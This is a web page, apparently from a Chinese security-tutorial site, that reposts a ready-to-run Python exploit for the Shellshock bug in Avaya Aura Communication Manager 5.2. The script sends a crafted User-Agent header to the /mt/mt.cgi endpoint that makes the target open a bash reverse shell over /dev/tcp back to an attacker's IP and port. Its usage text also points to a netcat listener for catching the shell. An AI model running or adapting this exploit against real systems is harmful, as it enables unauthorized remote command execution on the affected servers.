Avaya Aura Communication Manager 5.2遠程執行代碼

释放双眼,带上耳机,听听看~!
#!/usr/bin/python

import sys
import requests
 
if len(sys.argv) < 4:
	print "n[*] Avaya Aura Communication Manager (CM)- Shellshock Exploit"
	print "[*] Usage: <Victim's IP> <Attacker's IP> <Reverse Shell Port>" 
	print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 1337"
	print "[*] Netcat Listener: nc -lvvnp <port>"
	print "n"
	sys.exit()

#Disables request warning for cert validation ignore.
requests.packages.urllib3.disable_warnings() 
CM = sys.argv[1]
url = "https://" + CM + "/mt/mt.cgi"
attacker_ip = sys.argv[2]
rev_port = sys.argv[3]

http_headers = {
		
		"User-Agent": '() { test;};echo "Content-type: text/plain"; echo; echo; /bin/bash -i >& /dev/tcp/'+attacker_ip+'/'+rev_port+' 0>&1'
			
		}

def main():
		if len(sys.argv) == 4:
		  
		  print "[+] Success, spawning a shell on your custom port :)..."
		  requests.get(url, headers=http_headers, verify=False, timeout=5)
		
		else: 	
		  print "[-] Something went wrong, quitting..."
			
		sys.exit()
	

if __name__ == "__main__":
	main()
渗透教程质量好文

Kube Bench 检查是否根据 CIS Kubernetes 基准测试中定义的安全最佳实践部署了 Kubernetes

2020-7-1 0:22:53

安全工具质量好文

Frida iOS

2020-7-3 22:36:19

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
有新私信 私信列表
搜索